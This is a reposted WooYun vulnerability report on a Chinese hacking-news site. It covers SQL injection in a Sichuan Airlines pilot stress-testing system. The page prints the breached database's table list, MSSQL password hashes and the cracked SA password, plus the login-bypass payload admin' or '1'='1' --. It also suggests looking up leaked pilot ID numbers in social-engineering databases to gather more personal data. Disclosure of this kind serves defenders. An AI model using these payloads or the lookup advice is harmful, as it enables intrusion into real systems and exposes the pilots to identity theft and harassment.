记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

航空安全之四川航空某系统SQL注入(导致大量飞行员身份证信息泄露)

2015-12-12 03:00

主站这个:http://**.**.**.**



飞行员心里压力测试系统

SQL注入点,表单注入:

code 区域
http://**.**.**.**/

http://**.**.**.**/admin



1.jpg



2.jpg

3.jpg



code 区域
Database: MHCP

[23 tables]

+---------------+

| Admin_Class |

| Admin_Group |

| Admin_History |

| Admin_JiLu |

| Config |

| Dc_Test |

| Dc_Ti |

| Dc_admin |

| Dc_grade |

| Dc_input |

| Dc_rule |

| Dc_ruleMX |

| Dc_user |

| Down_Record |

| Ft_user |

| Ggao |

| Menu |

| MessageUser |

| News |

| T_Ti |

| admin_info |

| dtproperties |

| ft_UserGroup |

+---------------+



SA账号和密码:password: 123456a

code 区域
database management system users password hashes:

[*] ##MS_PolicyEventProcessingLogin## [1]:

password hash: 0x01002cc5f3a8b15b1cc3965f9bfe1934855dbdeb0db14b15c9da

header: 0x0100

salt: 2cc5f3a8

mixedcase: b15b1cc3965f9bfe1934855dbdeb0db14b15c9da



[*] ##MS_PolicyTsqlExecutionLogin## [1]:

password hash: 0x0100638decd70c53c4e70e8cc0543b32cc904a31b23ca74d3d5b

header: 0x0100

salt: 638decd7

mixedcase: 0c53c4e70e8cc0543b32cc904a31b23ca74d3d5b



[*] sa [1]:

password hash: 0x01002b38d4fa47b849dc217f22a0cff4947a3a5731299aaa19fb

header: 0x0100

salt: 2b38d4fa

mixedcase: 47b849dc217f22a0cff4947a3a5731299aaa19fb

clear-text password: 123456a





测试出大量的飞行员身份证信息,姓名由于编码问题无法显示出来

4.jpg



利用身份证号码直接可查询资料或在公开社工裤提取其它信息:

sc.jpg





万能密码绕过登陆:

code 区域
admin' or '1'='1' --



s.jpg





11.jpg



22.jpg





目录遍历:

code 区域
**.**.**.**/



list.jpg



list1.jpg





漏洞证明:

已证明;

修复方案:

参数化,过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0148883

阅读:78422 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“航空安全之四川航空某系统SQL注入(导致大量飞行员身份证信息泄露)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词